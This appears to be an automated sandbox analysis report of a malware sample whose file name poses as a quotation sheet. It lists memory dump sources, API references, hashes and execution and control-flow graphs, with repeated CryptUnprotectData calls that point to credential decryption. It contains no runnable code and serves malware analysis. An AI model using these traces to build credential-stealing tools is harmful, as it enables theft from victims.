                                                                                • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
                                                                                • CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
                                                                                • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9

                                                                                Execution Graph

                                                                                Execution Coverage: 10.5%
                                                                                Dynamic/Decrypted Code Coverage: 100%
                                                                                Signature Coverage: 5.7%
                                                                                Total number of Nodes: 194
                                                                                Total number of Limit Nodes: 15
                                                                                execution_graph 46026 37dd52f8 46027 37dd5600 46026->46027 46028 37dd5320 46026->46028 46029 37dd5329 46028->46029 46032 37dd4824 46028->46032 46031 37dd534c 46033 37dd482f 46032->46033 46035 37dd5643 46033->46035 46036 37dd4840 46033->46036 46035->46031 46037 37dd5678 OleInitialize 46036->46037 46038 37dd56dc 46037->46038 46038->46035 46039 37de64d8 46040 37de651e GetCurrentProcess 46039->46040 46042 37de6569 46040->46042 46043 37de6570 GetCurrentThread 46040->46043 46042->46043 46044 37de65ad GetCurrentProcess 46043->46044 46045 37de65a6 46043->46045 46046 37de65e3 46044->46046 46045->46044 46050 37de66a7 46046->46050 46047 37de660b GetCurrentThreadId 46048 37de663c 46047->46048 46051 37de6727 DuplicateHandle 46050->46051 46053 37de66b6 46050->46053 46052 37de67b6 46051->46052 46052->46047 46053->46047 46117 16cee0 46118 16ceec 46117->46118 46128 378411b7 46118->46128 46133 378411c0 46118->46133 46119 16cfa0 46138 37b9b15a 46119->46138 46142 37b9b168 46119->46142 46120 16d0bf 46121 16d11a 46120->46121 46146 37de53d0 46120->46146 46150 37de53c0 46120->46150 46130 378411c0 46128->46130 46129 378415c9 46129->46119 46130->46129 46154 3784b779 46130->46154 46159 3784c302 46130->46159 46135 378411e2 46133->46135 46134 378415c9 46134->46119 46135->46134 46136 3784b779 CryptUnprotectData 46135->46136 46137 3784c302 CryptUnprotectData 46135->46137 46136->46135 46137->46135 46140 37b9b18a 46138->46140 46139 37b9b617 46139->46120 46140->46139 46141 3784b779 CryptUnprotectData 46140->46141 46141->46140 46144 37b9b18a 46142->46144 46143 37b9b617 46143->46120 46144->46143 46145 3784b779 CryptUnprotectData 46144->46145 46145->46144 46147 37de53df 46146->46147 46194 37de4bec 46147->46194 46151 37de53df 46150->46151 46152 37de4bec 3 API calls 46151->46152 46153 37de5400 46152->46153 46153->46121 46155 3784b788 46154->46155 46163 3784bdc8 46155->46163 46172 3784bdba 46155->46172 46156 3784b7f8 
46156->46130 46160 3784c2b9 CryptUnprotectData 46159->46160 46162 3784c307 46159->46162 46161 3784c2cc 46160->46161 46161->46130 46162->46130 46164 3784bded 46163->46164 46165 3784bea1 46163->46165 46164->46165 46170 3784bdc8 CryptUnprotectData 46164->46170 46171 3784bdba CryptUnprotectData 46164->46171 46181 3784c077 46164->46181 46186 3784bfa8 46164->46186 46190 3784bbc8 46165->46190 46170->46165 46171->46165 46173 3784bded 46172->46173 46174 3784bea1 46172->46174 46173->46174 46177 3784c077 CryptUnprotectData 46173->46177 46178 3784bfa8 CryptUnprotectData 46173->46178 46179 3784bdc8 CryptUnprotectData 46173->46179 46180 3784bdba CryptUnprotectData 46173->46180 46175 3784bbc8 CryptUnprotectData 46174->46175 46176 3784c06d 46175->46176 46176->46156 46177->46174 46178->46174 46179->46174 46180->46174 46182 3784c07b 46181->46182 46183 3784c02d 46181->46183 46182->46165 46184 3784bbc8 CryptUnprotectData 46183->46184 46185 3784c06d 46184->46185 46185->46165 46187 3784bfbd 46186->46187 46188 3784bbc8 CryptUnprotectData 46187->46188 46189 3784c06d 46188->46189 46189->46165 46191 3784c258 CryptUnprotectData 46190->46191 46193 3784c06d 46191->46193 46193->46156 46195 37de4bf7 46194->46195 46198 37de6354 46195->46198 46197 37de6d86 46197->46197 46199 37de635f 46198->46199 46200 37de7624 46199->46200 46203 37de92b3 46199->46203 46208 37de92c0 46199->46208 46200->46197 46204 37de92bd 46203->46204 46205 37de9305 46204->46205 46213 37de9463 46204->46213 46217 37de9470 46204->46217 46205->46200 46209 37de92e1 46208->46209 46210 37de9305 46209->46210 46211 37de9463 3 API calls 46209->46211 46212 37de9470 3 API calls 46209->46212 46210->46200 46211->46210 46212->46210 46214 37de947d 46213->46214 46216 37de94b6 46214->46216 46221 37de7fa4 46214->46221 46216->46205 46219 37de947d 46217->46219 46218 37de94b6 46218->46205 46219->46218 46220 37de7fa4 3 API calls 46219->46220 46220->46218 46222 37de7faf 46221->46222 46223 37de9528 46222->46223 46225 37de7fd8 46222->46225 46226 37de7fe3 
46225->46226 46231 37de7fe8 46226->46231 46228 37de9597 46237 37deec48 46228->46237 46229 37de95d1 46229->46223 46232 37de7ff3 46231->46232 46243 37dea3e0 46232->46243 46234 37dea998 46234->46228 46235 37de92c0 3 API calls 46235->46234 46236 37dea770 46236->46234 46236->46235 46239 37deec79 46237->46239 46240 37deed79 46237->46240 46238 37deec85 46238->46229 46239->46238 46251 37b9faeb 46239->46251 46256 37b9faf0 46239->46256 46240->46229 46244 37dea3eb 46243->46244 46246 37debba1 46244->46246 46247 37dea624 46244->46247 46246->46236 46249 37debd00 FindWindowW 46247->46249 46250 37debd85 46249->46250 46250->46246 46252 37b9fb1b 46251->46252 46253 37b9fbca 46252->46253 46261 37dd0999 46252->46261 46265 37dd09a8 46252->46265 46257 37b9fb1b 46256->46257 46258 37b9fbca 46257->46258 46259 37dd0999 2 API calls 46257->46259 46260 37dd09a8 2 API calls 46257->46260 46259->46258 46260->46258 46263 37dd09ed CreateWindowExW 46261->46263 46264 37dd09f8 CreateWindowExW 46261->46264 46262 37dd09dd 46262->46253 46263->46262 46264->46262 46266 37dd09dd 46265->46266 46267 37dd09ed CreateWindowExW 46265->46267 46268 37dd09f8 CreateWindowExW 46265->46268 46266->46253 46267->46266 46268->46266 46054 ad044 46055 ad05c 46054->46055 46056 ad0b6 46055->46056 46061 37dd0b9f 46055->46061 46066 37dd0bb0 46055->46066 46071 37dd18f8 46055->46071 46077 37dd1908 46055->46077 46062 37dd0bb0 46061->46062 46064 37dd1908 2 API calls 46062->46064 46065 37dd18f8 2 API calls 46062->46065 46063 37dd0bf7 46063->46056 46064->46063 46065->46063 46067 37dd0bd6 46066->46067 46069 37dd1908 2 API calls 46067->46069 46070 37dd18f8 2 API calls 46067->46070 46068 37dd0bf7 46068->46056 46069->46068 46070->46068 46072 37dd1935 46071->46072 46073 37dd1967 46072->46073 46083 37dd1e98 46072->46083 46088 37dd1f64 46072->46088 46094 37dd1e88 46072->46094 46078 37dd1935 46077->46078 46079 37dd1967 46078->46079 46080 37dd1e98 2 API calls 46078->46080 46081 37dd1e88 2 API calls 46078->46081 46082 37dd1f64 2 API calls 
46078->46082 46080->46079 46081->46079 46082->46079 46085 37dd1eac 46083->46085 46084 37dd1f38 46084->46073 46099 37dd1f3f 46085->46099 46102 37dd1f50 46085->46102 46089 37dd1f22 46088->46089 46090 37dd1f72 46088->46090 46092 37dd1f3f 2 API calls 46089->46092 46093 37dd1f50 2 API calls 46089->46093 46091 37dd1f38 46091->46073 46092->46091 46093->46091 46095 37dd1e23 46094->46095 46095->46094 46097 37dd1f3f 2 API calls 46095->46097 46098 37dd1f50 2 API calls 46095->46098 46096 37dd1f38 46096->46073 46097->46096 46098->46096 46100 37dd1f61 46099->46100 46105 37dd3100 46099->46105 46100->46084 46103 37dd1f61 46102->46103 46104 37dd3100 2 API calls 46102->46104 46103->46084 46104->46103 46109 37dd3140 46105->46109 46113 37dd3130 46105->46113 46106 37dd312a 46106->46100 46110 37dd3182 46109->46110 46112 37dd3189 46109->46112 46111 37dd31da CallWindowProcW 46110->46111 46110->46112 46111->46112 46112->46106 46114 37dd3135 46113->46114 46115 37dd31da CallWindowProcW 46114->46115 46116 37dd3189 46114->46116 46115->46116 46116->46106

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 704 3784c302-3784c305 705 3784c307-3784c308 704->705 706 3784c2b9-3784c2ca CryptUnprotectData 704->706 707 3784c385-3784c3a5 705->707 708 3784c30a-3784c335 705->708 709 3784c2d3-3784c2fb 706->709 710 3784c2cc-3784c2d2 706->710 717 3784c3a7 707->717 718 3784c3ac-3784c3b3 707->718 711 3784c337 708->711 712 3784c33c-3784c382 708->712 710->709 711->712 712->707 717->718 719 3784c3b5 718->719 720 3784c3ba-3784c3c1 718->720 719->720 721 3784c3c3 720->721 722 3784c3c8-3784c3ed 720->722 721->722 724 3784c3f4-3784c427 722->724 725 3784c3ef 722->725 728 3784c42e-3784c435 724->728 729 3784c429 724->729 725->724 730 3784c437 728->730 731 3784c43c-3784c443 728->731 729->728 730->731 732 3784c445 731->732 733 3784c44a-3784c46a 731->733 732->733 735 3784c471-3784c498 733->735 736 3784c46c 733->736 738 3784c49f-3784c4e0 735->738 739 3784c49a 735->739 736->735 748 3784c4e2 call 3784ca80 738->748 749 3784c4e2 call 3784ca70 738->749 739->738 744 3784c4e8-3784c557 748->744 749->744
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3784C2BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID:
                                                                                • API String ID: 834300711-0
                                                                                • Opcode ID: 0942bea96cc12190b17d914ce40ca1f91724c1f87bfc11bb54052736737ea555
                                                                                • Instruction ID: dd0064e18eb0a52437dd7f912130bb11dcefc97e69eff2a1e56563600ffe2c89
                                                                                • Opcode Fuzzy Hash: 0942bea96cc12190b17d914ce40ca1f91724c1f87bfc11bb54052736737ea555
                                                                                • Instruction Fuzzy Hash: A2812475E0020D9FEB08DFE9D940BDEBBF2AF88310F248529E408AB355DB759946CB54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 832 3784bbc8-3784c2ca CryptUnprotectData 835 3784c2d3-3784c2fb 832->835 836 3784c2cc-3784c2d2 832->836 836->835
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3784C2BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID:
                                                                                • API String ID: 834300711-0
                                                                                • Opcode ID: c5db73b37ac4de0d4c14d658a463834e18252ee18aa9a29ba178aebc73b61e10
                                                                                • Instruction ID: abdb9b3b074f48ba3c2c946cce1fdefa5475ed0d739437a88076a5f8efca397f
                                                                                • Opcode Fuzzy Hash: c5db73b37ac4de0d4c14d658a463834e18252ee18aa9a29ba178aebc73b61e10
                                                                                • Instruction Fuzzy Hash: C11144B6800249AFDB10CF9AC844BDEBBF4EF58320F14841AE514A7241D3B8A954DFA1
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3784C2BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID:
                                                                                • API String ID: 834300711-0
                                                                                • Opcode ID: d12babfe9b0c07ec80d599474134d7663b7a76c441cb3d8a419d12b86c71f3f6
                                                                                • Instruction ID: 96aa60eb92b778ff8760fba88ea930e43c5f1dda1bc47f3a3f12d06b9088f202
                                                                                • Opcode Fuzzy Hash: d12babfe9b0c07ec80d599474134d7663b7a76c441cb3d8a419d12b86c71f3f6
                                                                                • Instruction Fuzzy Hash: A01159B6800249DFDB10CF99D844BDEBFF5EF58320F14841AE524A7251C378A594DFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b5f87bc67d04c010c001ac32dd4edf4cc1f299b6b12f176ba23fe869b627417
                                                                                • Instruction ID: e5f4d425e4538ef4c318031a492699c0b3b546642a781d72712c0f900c7b6c86
                                                                                • Opcode Fuzzy Hash: 9b5f87bc67d04c010c001ac32dd4edf4cc1f299b6b12f176ba23fe869b627417
                                                                                • Instruction Fuzzy Hash: E7826E74A112288FEB64DF69D894BDDBBB2BF89310F1081E9D80DA7261DB355E85CF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c64210db4275fb597e3d480f8745a544ba0c8145ca461e06883e41ab215df16
                                                                                • Instruction ID: 95595edb8c851c7ef0932fd454c7b518a9e3918b1623f273416ee99062c6a703
                                                                                • Opcode Fuzzy Hash: 8c64210db4275fb597e3d480f8745a544ba0c8145ca461e06883e41ab215df16
                                                                                • Instruction Fuzzy Hash: 4A72B074E01229CFDB64DF69D880BEDBBB2BB49305F5481EAD409A7251DB349E82CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46edb2261ad60be1a8126cd7af522540e541406553fc0f430004536bcfbbbdc0
                                                                                • Instruction ID: 501f6125dd26b28134ebf0449707206be5d5cf3ce262e03aa387fb2f72ba5730
                                                                                • Opcode Fuzzy Hash: 46edb2261ad60be1a8126cd7af522540e541406553fc0f430004536bcfbbbdc0
                                                                                • Instruction Fuzzy Hash: EA528D71A00209DFCB14DFA8CD94AAEBBF2BF89300F158555E806AB2A1D734ED51CF91
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f5657fa60779f8d07b746e92c5fd5dffe76011d6f11adb7282948c441188dd7
                                                                                • Instruction ID: 2cc5a24de32e6d106c8a92e695d2c3d3c2823eb041ba39bb2e6842441a1d1ca5
                                                                                • Opcode Fuzzy Hash: 6f5657fa60779f8d07b746e92c5fd5dffe76011d6f11adb7282948c441188dd7
                                                                                • Instruction Fuzzy Hash: 36227E70A002199FDB18DFA9C854BAEBBF6BF88304F148569E406EB391DF349D51DB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c267d94f5fd0bbde6604188e1aea8f1cdfabc6ba8aa69d623513a5433912147
                                                                                • Instruction ID: 98c458b0a60332ccac08bc0cdf6c855f5b19dc0235db65fc42be3b0fd7d436e9
                                                                                • Opcode Fuzzy Hash: 1c267d94f5fd0bbde6604188e1aea8f1cdfabc6ba8aa69d623513a5433912147
                                                                                • Instruction Fuzzy Hash: 77D12A71A00219DFCB14CFA9CD84AADBBB2FF88345F158069E845EB265D731ED61CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6fa6c266af2699fa2f4e884085f6d71eec3089b1f303a2950b9f60ea139ab9d7
                                                                                • Instruction ID: b25b2443c8fa5178e9216ba9c80d474efc8f8c3f68d11b4db5fe2b2ec04effab
                                                                                • Opcode Fuzzy Hash: 6fa6c266af2699fa2f4e884085f6d71eec3089b1f303a2950b9f60ea139ab9d7
                                                                                • Instruction Fuzzy Hash: 01E1C074E01218CFEB54DFA9D880BDDBBB2BF89304F2081A9D418AB391DB755A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0652a5e397bd1c6e681ad3818450ac712bdf3debf9b48ff2e726590c31256e61
                                                                                • Instruction ID: b3555fe6e8301fb8c15df85028ac59f02212cf93e5d89c4f173264f56b692eeb
                                                                                • Opcode Fuzzy Hash: 0652a5e397bd1c6e681ad3818450ac712bdf3debf9b48ff2e726590c31256e61
                                                                                • Instruction Fuzzy Hash: C0C1C074E00218CFEB54DFA9D880BDDBBB2AF89304F2081A9D419AB355DB355E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ee65befe3094702777774afabec03017a61eba589729159300363aa45b208c8
                                                                                • Instruction ID: c38b2575b5cb4d00b0728ea41e9d5724c1fb71bf41e66b2980d7e322feb238fe
                                                                                • Opcode Fuzzy Hash: 7ee65befe3094702777774afabec03017a61eba589729159300363aa45b208c8
                                                                                • Instruction Fuzzy Hash: DDC1A274E00218CFDB54DFA5D984B9DBBB2BF89304F2081A9D809A7365DB355E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f3eebe50ab98bf73130a9f20feffd2c88e0bb86ab791eb783892b0a9282da1cf
                                                                                • Instruction ID: 3c6f9b2d6956b978000d6f04a4c7f10c3d9627e867373802247539db501aedc8
                                                                                • Opcode Fuzzy Hash: f3eebe50ab98bf73130a9f20feffd2c88e0bb86ab791eb783892b0a9282da1cf
                                                                                • Instruction Fuzzy Hash: 20A1E874E04258DFDB18DFA9D894A9EBBF2BF89300F158069E419EB361DB349981CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5c334dff9d93d3d3e031fa2e9891bfb78edad2f7f747b7180a3fe8a86966075
                                                                                • Instruction ID: 089edfe476af8eb5140f64e8385e7509c07e65b12c1a98123f9efedf5de0a493
                                                                                • Opcode Fuzzy Hash: b5c334dff9d93d3d3e031fa2e9891bfb78edad2f7f747b7180a3fe8a86966075
                                                                                • Instruction Fuzzy Hash: 5EA1F474E00208CFEB14DFA9C944BDDBBB1FF89314F208269E419AB291DB745A85CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed69e2d250c902dbf66e62c29e6d816156cd1f2ad6e5390cdacf206ecf02352a
                                                                                • Instruction ID: 3e258e407a3e13cbc565978d7f28ef14549ac1b59f9f0d295979d3b8a9f13ceb
                                                                                • Opcode Fuzzy Hash: ed69e2d250c902dbf66e62c29e6d816156cd1f2ad6e5390cdacf206ecf02352a
                                                                                • Instruction Fuzzy Hash: 7B91E774E00208CFDB18DFAAD984AADBBF2BF89300F15C069E459AB365DB319941DF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7fee94f7e672c0fc1fd113e38a3fe8f327070255128d08823b50aa7aa314ddb0
                                                                                • Instruction ID: 0f95815ed4eb6ffc817226d6228dabbed688888d0c602f8d833eaebf55bb2c9b
                                                                                • Opcode Fuzzy Hash: 7fee94f7e672c0fc1fd113e38a3fe8f327070255128d08823b50aa7aa314ddb0
                                                                                • Instruction Fuzzy Hash: BAA180B4E012288FEB18DF6AC944BDDBBF2AB89300F14C5AAD408B7255DB745A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d629fb2876550eafa730b1c768df9a5e3c2b67fdc2187e482277a097416eda5a
                                                                                • Instruction ID: 6353bddebac797dd301d455d154ed3483c75015474851afffdaec3f2399490c9
                                                                                • Opcode Fuzzy Hash: d629fb2876550eafa730b1c768df9a5e3c2b67fdc2187e482277a097416eda5a
                                                                                • Instruction Fuzzy Hash: 51A19FB5E012288FEB58CF6AC945BDDBBF2AF89300F14C0AAD408B7255DB345A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4f7de048bdc9488a3acc4536cf86fc020f51652dc37a4cf05254d7fcffbce262
                                                                                • Instruction ID: 4a774a075c27526ba8b73837744c9ba6cb1a6e3728298ad1472189cf041acfef
                                                                                • Opcode Fuzzy Hash: 4f7de048bdc9488a3acc4536cf86fc020f51652dc37a4cf05254d7fcffbce262
                                                                                • Instruction Fuzzy Hash: F3A190B5E01228CFEB18CF6AC944BDDBBF2AB89310F14C1AAD408B7255DB345A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80259d7c9eaf58907224eba35c3612b9aa807a9a0cb7b18bbe6a7efdd46c08a6
                                                                                • Instruction ID: e5cd74e4115d048fca8eeebc227386a242a68b4623d5c4d30d37fb1a6a6daab7
                                                                                • Opcode Fuzzy Hash: 80259d7c9eaf58907224eba35c3612b9aa807a9a0cb7b18bbe6a7efdd46c08a6
                                                                                • Instruction Fuzzy Hash: E5A172B4E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD419A7255DB345A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 433b88b5a9218f7e9d868d6d6cb7c4f0f5355f16778f8c224aaf986b453efec0
                                                                                • Instruction ID: 5f9956160efb1960bb3a864826f88fbfe4179aa0d3c7c84f9b8a3ffb3ca3db25
                                                                                • Opcode Fuzzy Hash: 433b88b5a9218f7e9d868d6d6cb7c4f0f5355f16778f8c224aaf986b453efec0
                                                                                • Instruction Fuzzy Hash: 8EA190B4E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD408B7255DB745A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: df7f445370a73c6686ef5429fc37ae550e3503cd8572f871409b95591960acdd
                                                                                • Instruction ID: 8ee80f2e182a55f8435f2f20e60cd14d04d8c3bf4a1da8fae3b8955f493e11fe
                                                                                • Opcode Fuzzy Hash: df7f445370a73c6686ef5429fc37ae550e3503cd8572f871409b95591960acdd
                                                                                • Instruction Fuzzy Hash: 00A18FB5E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD409B7255DB345A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cc4474f60c0e125ea859e337a79a25e2238b73b741af758e58fd61e0763a248
                                                                                • Instruction ID: b7bd7aeea1bbd34e89a5afe8f8da88bae84f8b9c4c7a2961bf208aad3470e80b
                                                                                • Opcode Fuzzy Hash: 0cc4474f60c0e125ea859e337a79a25e2238b73b741af758e58fd61e0763a248
                                                                                • Instruction Fuzzy Hash: 11A184B5E012288FEB58CF6AC944BDDBBF2AF89300F14C1AAD409B7255DB345A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e240e258adb01cce947d34150b79e31acd5cfd3106e3e8553a0ea6fccd569ff1
                                                                                • Instruction ID: 7afe500c58e62e88bda9a4625aa7fe6c56a57b1d1bdcc04b2a0d64bf0442cc4e
                                                                                • Opcode Fuzzy Hash: e240e258adb01cce947d34150b79e31acd5cfd3106e3e8553a0ea6fccd569ff1
                                                                                • Instruction Fuzzy Hash: 4DA194B4E012288FEB54CF6AC944BDDBBF2AF89300F14D1AAD409B7255DB345A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7c00654e54fe72209fbe8c6eaecd7f80603d596cda444119f96b46915ed51a
                                                                                • Instruction ID: 7da09e08503f8e805dda479169eb24bbbaa314d36336824c11f933813e1586c1
                                                                                • Opcode Fuzzy Hash: 7d7c00654e54fe72209fbe8c6eaecd7f80603d596cda444119f96b46915ed51a
                                                                                • Instruction Fuzzy Hash: E8A192B4E012288FEB58CF6AC944BDDBBF2AF89300F14D1AAD408B7255DB345A85CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5327ab5c848d3dc72e493f7c389cf6213c6e27f6a54d457905eac1658a593360
                                                                                • Instruction ID: b0d3f9c762b91d27ab4bbca0ea5b4856de765b62224f086b806aee1ea835fd2b
                                                                                • Opcode Fuzzy Hash: 5327ab5c848d3dc72e493f7c389cf6213c6e27f6a54d457905eac1658a593360
                                                                                • Instruction Fuzzy Hash: 4391D274D00208CFEB14DFA9C984BDCBBB1FF49314F208269E409AB291DBB59A85CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
